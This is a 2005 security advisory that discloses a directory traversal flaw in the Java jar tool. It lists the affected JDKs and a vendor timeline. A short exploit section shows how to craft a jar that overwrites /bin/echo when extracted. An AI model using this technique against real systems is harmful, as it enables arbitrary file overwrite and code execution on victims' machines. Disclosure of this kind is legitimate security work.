- ------------------------------------------------------------------
       7a69ezine Advisories                      7a69Adv#23
- ------------------------------------------------------------------
  http://www.7a69ezine.org                            [01/04/2005]
- ------------------------------------------------------------------

Title:        Jar tool directory transversal vulnerability

Author:       Pluf - <pluf@7a69ezine.org>

Remote:       no

Exploit:      yes

Severity:     Medium-High

- ------------------------------------------------------------------




I. Introduction.

Jar is a java archiving and compression application, which is part 
of many java development kits. It was desgined mainly to facilitate 
the packaging of java applets or applications into a single archive.




II. Description.

The jar tool does not check properly if the files to be extracted
have the string "../" on its names, so it's possible for an attacker
to create a malicious jar file in order to overwrite arbitrary files 
within the filesystem.




III. Affected Software.

The following java development kits have been tested and contain the
vulnerability, but maybe others kits and/or platforms could be affected 
by the same:
 
 * SUN:

    Sun's J2SE Development Kit 1.5.0 (Solaris, Windows and Linux version)
    Sun's J2SE Development Kit 1.4.2 (Solaris, Windows and Linux version)

 * IBM:

    IBM Java Development Kit 1.4.2 Linux 

 * BEA:

    BEA WebLogic's J2SE Development Kit, version 1.5.0 (Linux and Windows 
version)

 * BLACKDOWN:

    Blackdown Java Development Kit 1.4.2 Linux




IV. Exploit.

A malicious jar file can be created as follows:

java4fun# echo hi
hi
java4fun# jar cvf trash.jar *.class ..o..o..o..o..o..o..obinoecho
java4fun# ht trash.jar   (change the 'o' by '/')
java4fun# jar xvf trash.jar (no overwrite message confirmation)
java4fun# echo hi
hi, you've just infected yourself!!!




V. Patch.

Not available. 
Use unzip instead of jar.




VI. Timeline.

23/03/2005  Bug discovered.
28/03/2005 Mail sent to vendors.
28/03/2005 Sun response.
02/04/2005 Mail sent to vendors (second try)
09/04/2005 Advisory released




VII. Extra data

 You can find more 7a69ezine advisories on this following link:

    http://www.7a69ezine.org/avisos/propios [spanish info]